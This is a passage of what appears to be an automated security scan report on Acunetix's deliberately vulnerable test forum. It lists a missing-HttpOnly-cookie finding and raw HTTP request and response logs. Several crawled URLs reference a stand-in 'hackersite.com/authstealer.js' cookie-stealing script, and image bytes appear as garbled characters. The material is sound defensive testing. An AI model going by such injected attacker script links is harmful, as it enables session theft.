href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| Instances | 2 |
| Solution |
Ensure that the HttpOnly flag is set for all cookies.
|
| Reference | https://owasp.org/www-community/HttpOnly |
| Tags |
OWASP_2021_A05
WSTG-v42-SESS-02 OWASP_2017_A06 |
| CWE Id | 1004 |
| WASC Id | 13 |
| Plugin Id | 10010 |
|
Low |
Cookie Slack Detector |
|---|---|
| Description |
Repeated GET requests: drop a different cookie each time, followed by normal request with all cookies to stabilize session, compare responses against original baseline GET. This can reveal areas where cookie based authentication/attributes are not actually enforced.
|
| URL | http://testasp.vulnweb.com/%C2%94http: |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 347 bytes. |
GET http://testasp.vulnweb.com/%C2%94http: HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:27 GMT Content-Length: 1245 |
| Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/%C2%94http:/hackersite.com |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 362 bytes. |
GET http://testasp.vulnweb.com/%C2%94http:/hackersite.com HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:28 GMT Content-Length: 1245 |
| Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/%C2%94http:/hackersite.com/authstealer.js%C2%94 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 383 bytes. |
GET http://testasp.vulnweb.com/%C2%94http:/hackersite.com/authstealer.js%C2%94 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:28 GMT Content-Length: 1245 |
| Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/avatars |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/avatars HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 229 bytes. |
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8 Location: http://testasp.vulnweb.com/avatars/ Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:29 GMT Content-Length: 158 |
| Response Body - size: 158 bytes. |
<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://testasp.vulnweb.com/avatars/">here</a></body> |
| URL | http://testasp.vulnweb.com/avatars/0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 346 bytes. |
GET http://testasp.vulnweb.com/avatars/0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:29 GMT Content-Length: 1245 |
| Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/avatars/noavatar.gif |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 357 bytes. |
GET http://testasp.vulnweb.com/avatars/noavatar.gif HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 247 bytes. |
HTTP/1.1 200 OK
Content-Type: image/gif Last-Modified: Thu, 29 May 2008 12:11:28 GMT Accept-Ranges: bytes ETag: "92c8971f85c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:29 GMT Content-Length: 950 |
| Response Body - size: 950 bytes. |
GIF89addæÿÿÿá
üüüþþþúúúûûûÿþþá þþÿå1:ÿÿþæ:Bã$þÿþÿþÿáímrìzèMTä*3õ²µêU[öööä$-ìdjò«®çFMï â!æ/8ââï úÕÖùùúûúúò¥§æBIé_eìqvó»½ñíùÌÎç@GòöÑÓþúúùññ÷æçä(÷ââúÜÝùùùâ÷÷÷úêëýýýð÷ÝÝýóóñ¿Áêioâ!èCJøÇÉñ´¶ôÉËþÿÿðûßàî|îóÝÞïøÞßøõõîqx÷÷øø÷øþüüûàâíöÁÂùÓÔöÚÚîw|ôÆÈûøøòúÙÚíáûÝßäó¡ë`fúÏÑûÞßã&ð°øøøèHNýïï!ù,ddÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÀרÙÚÛÜÙÄ å 9Q9à×óñóàÆDé Y¨èÀ WH'Hß¾g^t@±bE(¼Æã A Æ(-ÚHá,Ä0+61°Ìå1@ Í8q²D!¨Q4øôÁ Éà AZ°iCL±1R ¥-Sn(Fìÿ(Tè°`¸]R.Ø8CJ[@9¡ )¿ v¥\P°AÊÄ.¤tbAÊ=,hHÙXØ o$H â:I)äIe TH©Øj*ÌDjñB&¿C æå3pD §C¢ V¸;L0 0&Øñ¸ @ÀX`Ô'ФÄ0H AÀî§`t ]`ÃP ,0ÀH¨á°üp.HH(¦¨â,¶¨â.Æ(ãÕÔhã8æ¨ã<öèã@)äDiäH&©äL6éäPF)åTViå«; |
| URL | http://testasp.vulnweb.com/Images |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 323 bytes. |
GET http://testasp.vulnweb.com/Images HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 228 bytes. |
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8 Location: http://testasp.vulnweb.com/Images/ Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:30 GMT Content-Length: 157 |
| Response Body - size: 157 bytes. |
<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://testasp.vulnweb.com/Images/">here</a></body> |
| URL | http://testasp.vulnweb.com/Images/logo.gif |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 332 bytes. |
GET http://testasp.vulnweb.com/Images/logo.gif HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 248 bytes. |
HTTP/1.1 200 OK
Content-Type: image/gif Last-Modified: Thu, 29 May 2008 12:11:31 GMT Accept-Ranges: bytes ETag: "ceff952185c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:30 GMT Content-Length: 4933 |
| Response Body - size: 4,933 bytes. |
GIF89a2&÷HÍHå0¶0¨ò¨$«$îâHÄHªîëxÝxTÑTlálTÚTêHÒH0Ò0ôýîï0Å0TÌTÅÞ0º0ÿÿÿÆÍlÖlñ`Î`£0Î00Ì0`Ø`0°0`Ë``â`0®0lÑl¾HÙH±í<Å<0Ê0xâxxàxlÚlTàT`Þ``Ü``Ó`µHÜHHÚH¶xåxÊx×x$¾$`Ú`TÞT$Î$ÿÿ¿á
ËÊÌÉ???ÃÆÈÇ¿¿¿£½Ä§º¾°ÂÀ¢µ¸¤¨¶±¿ ¡ÁÅ»¬¹©®ª´¥«¯¼¦·þþý²³ïïï///___OOOÏÏÏ0Ç0ðßßßí¯¯¯`Ð`´ú´ñ´ù´`Í`oooá é`É``Ì`å1:¨ø¨´û´´ü´æ:Bã$xèxíøĘ̂÷¨êU[ímrä$-èMTä*3áTÄTìdjçFMüééå0¾0ítz`Ñ`æ/8ò²´â!ââöÂŨõ¨ðìä(üâãõ¼½öר<×<é_eò`Õ`xëxô¨¬ç@GèCJâ!ó£§êioúæçûÞßHÊHæBIïâlÝl$É$®<¼<òñ¦¨òH½HõÌÍýïïüäå÷ÓÔùßáúìì<Ú<TÖTñ±<È<ï}äáèHNã&ôÅÇë`fÐ$À$lçlõ°³ùØÙ¿HÕH$Ò$ö²µxØxïïñ £ë$¸$òº½üíîTÊT!ù,2&ÿ()Bp`II°I&B|ò¤IET2RѲq£Z¶¥d:'éгRK1Pbf¥¦Í@8ËèÜÙ¥ç.wî¼ú¢gàYz¥é5OÕ¨áCÕ«_¾¬Ñºf ¯zÂêé3¶O:h¥Í#HP<~âúC·M1vÛÚ[È_¿{f ÃØJø±;` <§²å?¹hæs7ݸ1CtÓqȨVí¤µk/^Àö"¶9r¤èÞ]¥÷ßU¦_BøãK7r¹çHABسkßν»÷ïàÃÿO¾¼ùóç EÎ9rá¿«H©wíÖ«ã#Z´fÌÌ1Yd b ahìaÈ^yÑåÇ[l¡Ext TñÕI5ÔO?éH#ÆäJ(E1ÒGT<Ñ"E1¤@JXÞ8æ¨ã<î¨{Ï)wDq¿ÅGßmµÅ¶§&ZgÿY6%V`ro©UY~µÕR%USI}TO]h'¦¨â eDQE9ÄPBac*è j÷ãtA"G¤»Ý~ª5iFa& T`iI×p½ ÖaUh¡UÉaCõ´N5Áÿ 'J(m1'w¨'}Öx]¡À+ì°R']{Æ-_|ºÙkê7iÔF)àih``{åðβåå¦fE¦N-EÔO®RF&Æ©¢,Úyg2$ÐÄöëï¿èz¬{Dö&_³I*É$jV¥×RYàaWî!%Bd<F¸~ ¦©c¹!¾Ánï8,¥h«Hõ¶g3îû+À8ç,%XAè@6§qðõ¶[®9Áä~ÓVËEMibÛúñÕúáÖ¸¥VH&ª¦[òÉnÆÊ2%Á3»*4#¿:Ç-wa÷!2]Ð/ÿk0ÂÏ*½piM?ýtI rµÆrê±X^.%2N%Î$ï¼tÖ{ï{æ[Ü9Êc,¬,K*çãÍÜ´{çÝDH·±¿ç·ÑÎ>´Óþ1¶F$W["B5tAØÖäZxîå$eò¯ªìùi«Í9ÔöA6ë8A6·áþûïïÊ)µÇm Ý>g·H#ül,{B²c´fÑæQùaÚ'%MAÌËX5ìÂ¥¶p-L!Ù:´½ ¡{ÓÙLB¯µ±MOÑêÌ]Àï /\4ê³û!ÃZïX´Ö'pÃ+Íÿ µ9<¦J @AEL¥ÓÌt¦¥°jM¯2Ûk%¾½O22¯p4 ~Ôh ÿeC K`Ú¤Ù(a {xDm¡A àÆ¤ç1²éBRÕRÆÆ&Á*&³ÓÆ+|ñªO+,ZqÆN¾¯kìWûG¡)¿in'8I-¦È- ²KÔ ®§H£EsíRY¼XbQRW»Ê×@2 MnÂÜ*B9¬Q«r ;! !°àR¸A Jha¥@ BñpÆ3§°ÐÀ®öÿP k=Æ h`p+5HèÔagÀ@%&ÚHxÀ<ÁÑDáûÀĸÁ`àðU³1gÏ&4ÕèJ0wL D¬,pGHÝÁGèn§==ªvxêÓì È%;Fè´;ªÝ¼aç©°Û" úU²fà©XpÄv$ÑÓ¦çPÑ1妰ztóq?¸DÆ"À8îqBè®Ä¥aa~X!`c~@c zÊ]¸-àP« ¨¸Z&Lt5ܰ#XÁ>8Äm¼ÙxL!ÓÚÿÃÝ +îp÷T»mØ-îüq§¸DÐU*\»=b;Ъp¡ÖPU¸LÀÎr±cCExU»vs«xt¤öÌUÅ^É6ÍXaX!L¢0ìcý`÷ aåºÚ·ÙÎf(: mÆF§« ±@c/PºÐÝ .dê WÈtÛA.¸Þ4¹Ù±!1Ö ¸Æ ±o³sÝcÁ 6ÅR£k7«âøÄ(«nÇUë!»ØA.3\F¼*Î8{׫ñUip¯fâ+ùR©¾EC~÷ØÔ½-°Pó3Xÿìh! XL`¢±w¾&Î7§$E-Nh$C¤Æ7´S7»»Áqѱ~w§ùC®,i#a>±[û\í ÷ÑÖï3pâçÚ°ouâ*$â ãj gл×Ö´÷j AX.pÙËv3aöPË»0àq hAÎ\1Ö¶(8ëYW)XðÜã.ð<8c ÁLg!ìÉmé7rqÆM°¢;ñpá}¡G;ÀSí¶êãÆØÔ¦ªw·s»g§ÒèN¥j#¯Òø®"ª[õË9<ÔkÆ6p° X¹5?ÿ¸Z)°Fürb óÇ«ò. ¸ÔÒùYy\ÄöæF~;Ü F÷Hp5hD«° e{Ô[Ø9E*n1 ~gàé8ã(´sb¥j§Ò(fõÁ»£i§ÝâÝùwÞ3+ØýîZMñÚ·«GDÚÑ«Nv5 üM "DkJpµHË?Æ&,¶MKSp Èèú«ÑLÍ«âRÞ¼¦.Î@^qµW¼¨W{ýXØQÅ[_² q§µ£[á¿íkçôÛù¾¹«¸¹»Õû {dî wý<ïäJ«]oMÿ3¦@È{ò3¯|Æn>«)`zf9ç·rÙ & ôÞ¸3v9àj#p'°u Á'FußQFfäPf$ ØA għÞ\Æm·pÕÇÎg7À$X&(}nÄ|ÒG¥¼Ó;Ý1ßw0r~NP W³ ã0ð%yÒµlÍÖ~ó~¢ò1´@à öçfWmrz1QZ&ñ3¯{ïö6è«pFý¬`F®0g[v]|F}!èpâQq*8iG×që(æµê%¢px ¨xNÀxNÿÂ\æWfÌfywÑW£ma³p5üÀBàö÷fÀ&T(V¨"X(ZHèn¦s:_ØôCgpF¸ÅpFÆ ?vsUÛvÂH|ÈÈy'|urw=ÖàFzøÆÁk.øÙ´ W#C'ç)p5¨¤ÐÖlSW£Bm°Oó*ð%Ïv5]õVôfÀ.1ذ2Wã iÓ¯ø±Ø èã'µÈëpFÝÒpFì©pFú0pØþ&i×GܸVÜ5FptwxèiB};µw#ÿ\%édO6kqT2ð8p"·^N 3 NPò8¡Ð ð8äPëGAÕ<1 WxtMØKð8Àç1°BÀ"á[1(daaÛ±f4 ` 1?«v C½øp=vT bo§UC@ØqÖ U-w ¯Æq [^u])k7KàþÕk%póAH@è_6 fa)6pÐnFI'$0/n \(FIehF ¤{9·Cà°T»ÕZøv~;D S$©$;)©j0ÿ)^×I'6bßuHæç~gJÉ!ðÐX¢®¡¼XÕòîÕSsëç)~ÐgX`=¹*Fñþ¤1Éh'±B5CÚA[wŰaCð íCÀÀVÐ+æØwÒµ[;;Ôµ{h1©|Øuiì ^;*U"kß4¤(ÅqC6¨;Ð ôðWó(0 C=À ô J2GYu+S Ú"9sYÛ" ?Ìðâá¡/ÄÜq°LÀ@¤ÛA X@IõSÀ$ÿ¨ ĸ#ðÊiE;PVk47À, <Â$)P Ð3(à: @.-Yrw0 ³À6A=w`Qà@"iÚ2ÅT'ö23ïÆ+´ùðB äñî³ â@Màª};´(FBH)d°CD-ð4QcXÉ âÒqKÕ³e*j°H¿LïRoò*6Qã#3`4ñF ¤@ ±P¢ò¦ À«x®K(QÆCEr0u$<£ë:¥¯³%5¢<E_ÿi9aã ÛHï"Bqâ2jãEȤ¡ná{´qMH:G&{²¡£á0Ó²!KÛB«1Ë%Eb2þú¯d2Û³9Þ/r">$aÔ+F´nû/p$§D@t´JÂãxG,5U[ Pò%rKw_Q.S.yEÔ&$+òò2,¢.Bj;{mû¶ûFÞ,À0)Bä4î1~;«  M.\s¸Ö£A°2>ë¬sB'ñE4CÕº¹Àë/F*·Éò;Í"³aN®4DÖ<~D«"H®{Aaj9#¶jâ*=+?û¬&Ä6ÿû»Á;¾ÁRJAÉ´&ë,Ð");X)T+Kr%ô*H%.G¬BE«ÂAÛ#"ÛIÎÊEº¶øÒAK¾ #@»,Ìb@É+8KÓ4P5RÓÊ)µ*³â"Óµù*³K¬¥W6Íê¬/3Àö¾¾ë+1#A¼²'æy#Q¹Á>¬°#A&A+*Á/á46q9±:Á& "Dá!J¡LáP!SQWaY±]á`!dagkÑo!sQ¶j|Ña1 q¡á!a ÁýA8ûK"BIÓÏ2µQ¹Ñ(ó Åaî¡ '@R; |
| URL | http://testasp.vulnweb.com/jscripts |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/jscripts HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 230 bytes. |
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8 Location: http://testasp.vulnweb.com/jscripts/ Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:31 GMT Content-Length: 159 |
| Response Body - size: 159 bytes. |
<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://testasp.vulnweb.com/jscripts/">here</a></body> |
| URL | http://testasp.vulnweb.com/jscripts/tiny_mce |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 354 bytes. |
GET http://testasp.vulnweb.com/jscripts/tiny_mce HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 239 bytes. |
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8 Location: http://testasp.vulnweb.com/jscripts/tiny_mce/ Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:31 GMT Content-Length: 168 |
| Response Body - size: 168 bytes. |
<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://testasp.vulnweb.com/jscripts/tiny_mce/">here</a></body> |
| URL | http://testasp.vulnweb.com/jscripts/tiny_mce/tiny_mce.js |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/jscripts/tiny_mce/tiny_mce.js HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 263 bytes. |
HTTP/1.1 200 OK
Content-Type: application/javascript Last-Modified: Thu, 29 May 2008 12:11:36 GMT Accept-Ranges: bytes ETag: "7edd7d2485c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:32 GMT Content-Length: 132342 |
| Response Body - size: 132,342 bytes. |
/**
* $RCSfile: tiny_mce.js,v $ * $Revision: 1.301 $ * $Date: 2005/10/30 16:06:56 $ * * @author Moxiecode * @copyright Copyright � 2004, Moxiecode Systems AB, All rights reserved. */ function TinyMCE(){this.majorVersion="2";this.minorVersion="0RC4";this.releaseDate="2005-10-30";this.instances=new Array();this.stickyClassesLookup=new Array();this.windowArgs=new Array();this.loadedFiles=new Array();this.configs=new Array();this.currentConfig=0;this.eventHandlers=new Array();var ua=navigator.userAgent;this.isMSIE=(navigator.appName=="Microsoft Internet Explorer");this.isMSIE5=this.isMSIE&&(ua.indexOf('MSIE 5')!=-1);this.isMSIE5_0=this.isMSIE&&(ua.indexOf('MSIE 5.0')!=-1);this.isGecko=ua.indexOf('Gecko')!=-1;this.isGecko18=ua.indexOf('Gecko')!=-1&&ua.indexOf('rv:1.8')!=-1;this.isSafari=ua.indexOf('Safari')!=-1;this.isOpera=ua.indexOf('Opera')!=-1;this.isMac=ua.indexOf('Mac')!=-1;this.isNS7=ua.indexOf('Netscape/7')!=-1;this.isNS71=ua.indexOf('Netscape/7.1')!=-1;this.dialogCounter=0;if(this.isOpera){this.isMSIE=true;this.isGecko=false;this.isSafari=false;}this.idCounter=0;};TinyMCE.prototype.defParam=function(key,def_val){this.settings[key]=tinyMCE.getParam(key,def_val);};TinyMCE.prototype.init=function(settings){var theme;this.settings=settings;if(typeof(document.execCommand)=='undefined')return;if(!tinyMCE.baseURL){var elements=document.getElementsByTagName('script');for(var 